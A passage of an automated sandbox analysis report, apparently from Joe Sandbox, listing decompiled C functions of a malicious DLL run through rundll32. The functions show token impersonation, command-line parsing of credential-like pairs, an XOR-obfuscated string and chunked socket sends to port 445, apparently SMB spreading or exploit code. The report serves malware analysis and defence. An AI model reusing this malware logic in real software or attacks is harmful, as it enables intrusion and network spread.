      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E6B90
    • HeapFree.KERNEL32(00000000), ref: 011E6B97
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7003, Relevance: 10.1, APIs: 8, Instructions: 61
    C-Code - Quality: 86%
    			E011E7003(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t23;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t47;
				void* _t52;

				_t52 = __esi;
				if(__esi != 0) {
					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
						L11:
						return HeapFree(GetProcessHeap(), 0, _t52);
					}
					_v8 = _v8 & 0x00000000;
					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
						L10:
						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
						goto L11;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 =  *(_t52 + 0x18) + _v8 * 4;
						if( *_t30 != 0) {
							_t32 =  *_t30;
							if( *_t32 != 0) {
								_t47 =  *((intOrPtr*)(_t52 + 0x30));
								if(_t47 != 0) {
									 *_t47( *_t32);
								}
								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
							}
							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
					goto L10;
				}
				return _t23;
			}









    0x011e7003
    0x011e7009
    0x011e7021
    0x011e7085
    0x00000000
    0x011e708e
    0x011e7026
    0x011e702c
    0x011e707b
    0x011e7083
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e702e
    0x011e702e
    0x011e7034
    0x011e703a
    0x011e703c
    0x011e7041
    0x011e7043
    0x011e7048
    0x011e704c
    0x011e704c
    0x011e705e
    0x011e705e
    0x011e706e
    0x011e706e
    0x011e7070
    0x011e7076
    0x00000000
    0x011e702e
    0x011e7090

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E705B
    • HeapFree.KERNEL32(00000000), ref: 011E705E
    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E706B
    • HeapFree.KERNEL32(00000000), ref: 011E706E
    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7080
    • HeapFree.KERNEL32(00000000), ref: 011E7083
    • GetProcessHeap.KERNEL32(00000000,00000000,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7088
    • HeapFree.KERNEL32(00000000), ref: 011E708B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9EC7, Relevance: 9.1, APIs: 6, Instructions: 76
    C-Code - Quality: 87%
    			E011E9EC7(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void*** _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				void* __ebx;
				void* __esi;
				intOrPtr _t22;
				void* _t29;
				struct _SECURITY_ATTRIBUTES* _t39;
				void _t41;
				void* _t44;

				_t39 = 0;
				_t41 = 0;
				_v12 = 0;
				_t22 = E011E711F(0,  &_v12);
				_v16 = _t22;
				if(_t22 == 0) {
					L12:
					return _t41;
				}
				while(1) {
					_t44 =  *( *_v12);
					_v32 = _t39;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v28 = _a4;
					_t29 = CreateThread(_t39, _t39, E011E9EA4,  &_v32, 4, _t39);
					_v8 = _t29;
					if(_t29 != _t39) {
						if(SetThreadToken( &_v8, _t44) != 0) {
							if(ResumeThread(_v8) == 0xffffffff) {
								GetLastError();
							} else {
								WaitForSingleObject(_v8, 0xffffffff);
							}
						}
						CloseHandle(_v8);
					}
					_t41 = _v32;
					if(_t41 != _t39 || E011E7167(_v16, _a8,  &_v12) == 0) {
						break;
					}
					_t39 = 0;
				}
				E011E6F78(_v16);
				goto L12;
			}















    0x011e9ed6
    0x011e9eda
    0x011e9edc
    0x011e9edf
    0x011e9ee4
    0x011e9ee9
    0x011e9f85
    0x011e9f8b
    0x011e9f8b
    0x011e9ef3
    0x011e9ef8
    0x011e9efc
    0x011e9f02
    0x011e9f03
    0x011e9f04
    0x011e9f0b
    0x011e9f19
    0x011e9f1f
    0x011e9f24
    0x011e9f33
    0x011e9f41
    0x011e9f50
    0x011e9f43
    0x011e9f48
    0x011e9f48
    0x011e9f41
    0x011e9f59
    0x011e9f59
    0x011e9f5f
    0x011e9f64
    0x00000000
    0x00000000
    0x011e9ef1
    0x011e9ef1
    0x011e9f80
    0x00000000

    APIs
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
      • Part of subcall function 011E711F: HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
      • Part of subcall function 011E711F: HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    • CreateThread.KERNEL32(00000000,00000000,011E9EA4,?,00000004,00000000), ref: 011E9F19
    • SetThreadToken.ADVAPI32(?,?), ref: 011E9F2B
    • ResumeThread.KERNEL32(?), ref: 011E9F38
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9F48
    • GetLastError.KERNEL32 ref: 011E9F50
    • CloseHandle.KERNEL32(?), ref: 011E9F59
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8320, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
    C-Code - Quality: 100%
    			E011E8320(WCHAR* _a4) {
				WCHAR* _t6;
				short _t8;

				_t8 = 0;
				if(PathCombineW(_a4, L"C:\\Windows\\", PathFindFileNameW(?str?)) != 0) {
					_t6 = PathFindExtensionW(_a4);
					if(_t6 != 0) {
						 *_t6 = 0;
						_t8 = 1;
					}
				}
				return _t8;
			}





    0x011e8329
    0x011e8342
    0x011e8347
    0x011e834f
    0x011e8353
    0x011e8356
    0x011e8356
    0x011e834f
    0x011e835b

    APIs
    • PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
    • PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
    • PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    Strings
    • C:\Users\luketaylor\Desktop\abc.dll, xrefs: 011E8324
    • C:\Windows\, xrefs: 011E8332
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6A2B, Relevance: 7.6, APIs: 5, Instructions: 72
    C-Code - Quality: 100%
    			E011E6A2B(void* __ecx, short* _a4) {
				int _v8;
				intOrPtr* _t15;
				int _t21;
				WCHAR* _t25;
				signed int _t30;
				void* _t34;
				WCHAR* _t38;
				void* _t40;

				if(_a4 != 0) {
					_t15 = _a4;
					_t34 = _t15 + 2;
					do {
						_t33 =  *_t15;
						_t15 = _t15 + 2;
					} while (_t33 != 0);
					if(_t15 != _t34) {
						_v8 = 0;
						_t40 = CommandLineToArgvW(_a4,  &_v8);
						if(_t40 != 0) {
							if(_v8 > 0) {
								_t21 = StrToIntW( *_t40);
								_t30 = 1;
								if(_t21 > 0) {
									 *0x11ff760 = _t21;
								}
								if(_v8 > _t30) {
									while(1) {
										_t38 =  *(_t40 + _t30 * 4);
										if(_t38 == StrStrW(_t38, 0x11f3ff0)) {
											break;
										}
										_t25 = StrChrW(_t38, 0x3a);
										if(_t25 != 0) {
											_t33 = 0;
											 *_t25 = 0;
											E011E6DE0(_t38,  &(_t25[1]), 1);
										}
										_t30 = _t30 + 1;
										if(_t30 < _v8) {
											continue;
										} else {
										}
										goto L15;
									}
									E011E69A2( *(_t40 + _t30 * 4), _t33);
								}
								L15:
							}
							LocalFree(_t40);
						}
					}
				}
				if( *0x11ff760 == 0) {
					 *0x11ff760 = 0x3c;
				}
				return 0;
			}











    0x011e6a35
    0x011e6a3b
    0x011e6a3e
    0x011e6a41
    0x011e6a41
    0x011e6a44
    0x011e6a47
    0x011e6a50
    0x011e6a5e
    0x011e6a67
    0x011e6a6b
    0x011e6a70
    0x011e6a75
    0x011e6a7d
    0x011e6a80
    0x011e6a82
    0x011e6a82
    0x011e6a8a
    0x011e6a8c
    0x011e6a8c
    0x011e6a9d
    0x00000000
    0x00000000
    0x011e6aa2
    0x011e6aaa
    0x011e6aac
    0x011e6aae
    0x011e6ab8
    0x011e6ab8
    0x011e6abd
    0x011e6ac1
    0x00000000
    0x00000000
    0x011e6ac3
    0x00000000
    0x011e6ac1
    0x011e6ac8
    0x011e6ac8
    0x011e6acd
    0x011e6acd
    0x011e6acf
    0x011e6acf
    0x011e6ad5
    0x011e6a50
    0x011e6ade
    0x011e6ae0
    0x011e6ae0
    0x011e6aed

    APIs
    • CommandLineToArgvW.SHELL32(?,?), ref: 011E6A61
    • StrToIntW.SHLWAPI(00000000), ref: 011E6A75
    • StrStrW.SHLWAPI(00000000,011F3FF0), ref: 011E6A95
    • StrChrW.SHLWAPI(00000000,0000003A), ref: 011E6AA2
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
      • Part of subcall function 011E69A2: CommandLineToArgvW.SHELL32(-00000004,?), ref: 011E69D8
      • Part of subcall function 011E69A2: LocalFree.KERNEL32(00000000,?,?,?,011E6ACD,?,?,00000000,?,?,011E7E71,?), ref: 011E6A1E
    • LocalFree.KERNEL32(00000000,?,00000000,?,?,011E7E71,?), ref: 011E6ACF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7091, Relevance: 6.3, APIs: 5, Instructions: 43
    C-Code - Quality: 100%
    			E011E7091(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* __esi;
				signed int _t14;
				void* _t17;
				struct _CRITICAL_SECTION* _t24;

				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
				if(_t24 != 0) {
					InitializeCriticalSection(_t24);
					_t14 = _a16;
					 *(_t24 + 0x20) = _t14;
					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
					_t22 = _a12;
					 *((intOrPtr*)(_t24 + 0x24)) = 0;
					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
					_t17 = HeapAlloc(GetProcessHeap(), 8, _t14 << 2);
					 *(_t24 + 0x18) = _t17;
					if(_t17 == 0) {
						E011E7003(_t22, _t24);
						_t24 = 0;
					}
				}
				return _t24;
			}







    0x011e70ac
    0x011e70b0
    0x011e70b3
    0x011e70b9
    0x011e70bf
    0x011e70c2
    0x011e70cb
    0x011e70ce
    0x011e70d4
    0x011e70db
    0x011e70e1
    0x011e70e3
    0x011e70e8
    0x011e70ea
    0x011e70ef
    0x011e70ef
    0x011e70e8
    0x011e70f7

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
    • HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
    • InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
    • GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
    • HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E705B
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E705E
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E706B
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E706E
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7080
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E7083
      • Part of subcall function 011E7003: GetProcessHeap.KERNEL32(00000000,00000000,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7088
      • Part of subcall function 011E7003: HeapFree.KERNEL32(00000000), ref: 011E708B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E407B, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192
    C-Code - Quality: 100%
    			E011E407B(void* __ecx, signed short* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t82;
				signed int _t83;
				void* _t84;
				void* _t85;
				signed int _t86;
				void* _t88;
				void* _t93;
				void* _t98;
				void* _t100;
				void* _t104;
				signed int _t112;
				void* _t116;
				signed short* _t132;
				void** _t134;
				void* _t142;
				void* _t143;

				_t132 = __edi;
				_v36 = _a12 & 0x0000ffff;
				_t82 = E011E3061(_a4, __ecx, _a8,  &_v36, _a16, _a20,  *__edi & 0x0000ffff);
				if(_t82 == 0) {
					_t83 = E011E1000(0x8e);
					_t112 = 0;
					_v8 = _t83;
					__eflags = _t83;
					if(_t83 != 0) {
						_v20 = 0;
						_t84 = E011E1000(0x1000);
						_v16 = _t84;
						__eflags = _t84;
						if(_t84 == 0) {
							L18:
							_t134 =  &_v8;
							L21:
							_t85 = E011E20D0(_t134);
							L25:
							_t86 = _t85 | 0xffffffff;
							L27:
							L28:
							return _t86;
						}
						 *__edi =  *__edi + 1;
						_v24 = 0;
						_v32 = 0;
						_v12 = 0x8000;
						_t88 = E011E2C1E(_a24, 0x7e00, 0xc007, _a8, _a12, _a16, _a20,  *__edi & 0x0000ffff, 0, 0xff,  &_v20);
						_v28 = _t88;
						__eflags = _t88;
						if(_t88 != 0) {
							while(1) {
								memcpy(_v8, _t88, _v20 & 0x0000ffff);
								_t143 = _t142 + 0xc;
								E011E20D0( &_v28);
								_t93 = E011E2C1E(_a24, _v12 + 0xfffffe00, 0xc007, _a8, _v36, _a16, _a20,  *_t132 & 0x0000ffff, _t112, 0xff,  &_v20);
								_v28 = _t93;
								__eflags = _t93 - _t112;
								if(_t93 == _t112) {
									goto L6;
								}
								_t123 = _v20 & 0x0000ffff;
								_t35 = _v8 + 0x47; // 0x76e6c46d
								memcpy(_t35, _t93, _v20 & 0x0000ffff);
								_t142 = _t143 + 0xc;
								E011E20D0( &_v28);
								_t98 = E011E688F(_a4, _v8, 0x8e);
								__eflags = _t98;
								if(_t98 != 0) {
									L17:
									E011E20D0( &_v16);
									goto L18;
								}
								_t116 = _v16;
								_t100 = E011E243F(_t123, _a4, 2, _t116);
								__eflags = _t100;
								if(_t100 != 0) {
									goto L17;
								}
								__eflags =  *((intOrPtr*)(_t116 + 9)) - _t100;
								if( *((intOrPtr*)(_t116 + 9)) != _t100) {
									goto L6;
								}
								_v32 = _v32 + (_v12 & 0x0000ffff);
								_v12 = _v12 + 0x1000;
								__eflags = _v12 - 0xc000;
								if(_v12 > 0xc000) {
									_v12 = 0x8000;
								}
								__eflags = _v32 - 0x100000;
								if(_v32 >= 0x100000) {
									_t104 = E011E30FE(_t123, _a4, _a8, _v36, _a16, _a20,  *_t132 & 0x0000ffff);
									_t137 =  &_v8;
									__eflags = _t104;
									if(_t104 == 0) {
										E011E20D0( &_v8);
										E011E20D0( &_v16);
										Sleep(0x456);
										_v24 = _v24 & 0x00000000;
										while(1) {
											 *_t132 =  *_t132 + 1;
											_t85 = E011E35FA(_a4, _t123, 0xfe80, __eflags, 0xc007, _a8, _a12, _a16, _a20,  *_t132 & 0x0000ffff, 0, 0xff, _a24);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L25;
											}
											_v24 = _v24 + 1;
											__eflags = _v24 - 0x37;
											if(__eflags > 0) {
												_t86 = 0;
												__eflags = 0;
												goto L27;
											}
										}
										goto L25;
									}
									L20:
									E011E20D0(_t137);
									_t134 =  &_v16;
									goto L21;
								} else {
									 *_t132 =  *_t132 + 1;
									_t88 = E011E2C1E(_a24, _v12 + 0xfffffe00, 0xc007, _a8, _a12, _a16, _a20,  *_t132 & 0x0000ffff, 0, 0xff,  &_v20);
									_v28 = _t88;
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0;
										__eflags = 0;
										continue;
									}
									goto L6;
								}
							}
						}
						L6:
						_t137 =  &_v8;
						goto L20;
					}
					_t86 = _t83 | 0xffffffff;
					goto L28;
				}
				return _t82 | 0xffffffff;
			}





























    0x011e407b
    0x011e4085
    0x011e409c
    0x011e40a3
    0x011e40b3
    0x011e40b8
    0x011e40ba
    0x011e40bd
    0x011e40bf
    0x011e40cf
    0x011e40d2
    0x011e40d7
    0x011e40da
    0x011e40dc
    0x011e4242
    0x011e4242
    0x011e426e
    0x011e426e
    0x011e42d2
    0x011e42d2
    0x011e42d9
    0x011e42da
    0x00000000
    0x011e42da
    0x011e40e2
    0x011e4101
    0x011e4107
    0x011e410d
    0x011e4119
    0x011e411e
    0x011e4121
    0x011e4123
    0x011e412f
    0x011e4138
    0x011e413d
    0x011e4143
    0x011e4173
    0x011e4178
    0x011e417b
    0x011e417d
    0x00000000
    0x00000000
    0x011e417f
    0x011e4188
    0x011e418c
    0x011e4191
    0x011e4194
    0x011e41a2
    0x011e41a7
    0x011e41a9
    0x011e423a
    0x011e423d
    0x00000000
    0x011e423d
    0x011e41af
    0x011e41bb
    0x011e41c0
    0x011e41c2
    0x00000000
    0x00000000
    0x011e41c4
    0x011e41c7
    0x00000000
    0x00000000
    0x011e41d1
    0x011e41d4
    0x011e41e0
    0x011e41e4
    0x011e41e6
    0x011e41e6
    0x011e41ed
    0x011e41f4
    0x011e425a
    0x011e425f
    0x011e4262
    0x011e4264
    0x011e4275
    0x011e427d
    0x011e4287
    0x011e428d
    0x011e42a7
    0x011e42aa
    0x011e42c9
    0x011e42ce
    0x011e42d0
    0x00000000
    0x00000000
    0x011e429d
    0x011e42a0
    0x011e42a5
    0x011e42d7
    0x011e42d7
    0x00000000
    0x011e42d7
    0x011e42a5
    0x00000000
    0x011e42a7
    0x011e4266
    0x011e4266
    0x011e426b
    0x00000000
    0x011e41f6
    0x011e41f6
    0x011e4225
    0x011e422a
    0x011e422d
    0x011e422f
    0x011e412d
    0x011e412d
    0x00000000
    0x011e412d
    0x00000000
    0x011e4235
    0x011e41f4
    0x011e412f
    0x011e4125
    0x011e4125
    0x00000000
    0x011e4125
    0x011e40c1
    0x00000000
    0x011e40c1
    0x00000000

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E4138
    • memcpy.MSVCRT ref: 011E418C
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E2C1E: memcpy.MSVCRT ref: 011E2CAD
    • Sleep.KERNEL32(00000456,00001000,002F1C10,?,002F1C10,?,0000C000,00008000,00000002,002F1C10,76E6C426,0000008E,00000000,000000FF,00058778,002F1C10), ref: 011E4287
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E29CE, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107
    C-Code - Quality: 100%
    			E011E29CE(signed short* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				char _v16;
				void* __esi;
				void* _t26;
				void* _t28;
				signed int _t29;
				short _t30;
				short _t31;
				int _t34;
				void* _t37;
				void* _t39;
				signed short _t40;
				signed short* _t51;
				void* _t52;
				void* _t53;
				signed int _t54;
				void* _t56;
				signed int _t61;
				void* _t64;
				void* _t69;
				void* _t70;

				_t51 = __eax;
				_t26 = E011E1000(0x2d);
				_t56 = _t26;
				_v8 = _t56;
				if(_t56 == 0) {
					return _t26;
				}
				memcpy(_t56, "u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu", 0x2d);
				_t70 = _t69 + 0xc;
				_t28 = _t56;
				_t53 = 0x2d;
				do {
					 *_t28 =  *_t28 ^ 0x00000075;
					_t28 = _t28 + 1;
					_t53 = _t53 - 1;
				} while (_t53 != 0);
				_t29 = E011E1000(0x38);
				_t61 = _t29;
				if(_t61 != 0) {
					_t30 = 0x58;
					 *((short*)(_t61 + 3)) = _t30;
					_t31 = 8;
					 *((short*)(_t61 + 5)) = _t31;
					 *((short*)(_t61 + 7)) = 1;
					_t34 = 0x2d;
					 *(_t61 + 9) = _t34;
					_t8 = _t61 + 0xb; // 0xb
					 *_t61 = 0xff04;
					memcpy(_t8, _t56, _t34);
					_t70 = _t70 + 0xc;
					_v12 = _t61;
				} else {
					_v12 = _v12 & _t29;
				}
				_t37 = _v12;
				_v16 = _t37;
				if(_t37 == 0) {
					L9:
					E011E20D0( &_v8);
					_t39 = 0;
					goto L10;
				} else {
					_t40 = 0x5c;
					 *_t51 = _t40;
					_t64 = E011E2466(_t40, 0x75, 0xc007, _a4, 0, _a8, _a12, _a16);
					_a16 = _t64;
					if(_t64 != 0) {
						_t52 = E011E1000( *_t51 & 0x0000ffff);
						if(_t52 != 0) {
							_t54 = 9;
							_t23 = _t52 + 0x24; // 0x24
							memcpy(_t52, _t64, _t54 << 2);
							memcpy(_t23, _v12, 0x38);
						}
						E011E20D0( &_v16);
						E011E20D0( &_v8);
						E011E20D0( &_a16);
						_t39 = _t52;
						L10:
						return _t39;
					}
					E011E20D0( &_v16);
					goto L9;
				}
			}

























    0x011e29d8
    0x011e29da
    0x011e29df
    0x011e29e1
    0x011e29e6
    0x011e2a97
    0x011e2a97
    0x011e29f4
    0x011e29f9
    0x011e29fe
    0x011e2a00
    0x011e2a01
    0x011e2a01
    0x011e2a04
    0x011e2a05
    0x011e2a05
    0x011e2a0b
    0x011e2a10
    0x011e2a14
    0x011e2a1d
    0x011e2a20
    0x011e2a24
    0x011e2a25
    0x011e2a2e
    0x011e2a32
    0x011e2a34
    0x011e2a38
    0x011e2a3d
    0x011e2a42
    0x011e2a47
    0x011e2a4a
    0x011e2a16
    0x011e2a16
    0x011e2a16
    0x011e2a4d
    0x011e2a50
    0x011e2a55
    0x011e2a89
    0x011e2a8c
    0x011e2a91
    0x00000000
    0x011e2a57
    0x011e2a59
    0x011e2a5d
    0x011e2a78
    0x011e2a7a
    0x011e2a7f
    0x011e2aa3
    0x011e2aa7
    0x011e2ac7
    0x011e2acd
    0x011e2ad3
    0x011e2ad5
    0x011e2ada
    0x011e2aac
    0x011e2ab4
    0x011e2abc
    0x011e2ac1
    0x011e2a93
    0x00000000
    0x011e2a93
    0x011e2a84
    0x00000000
    0x011e2a84

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E29F4
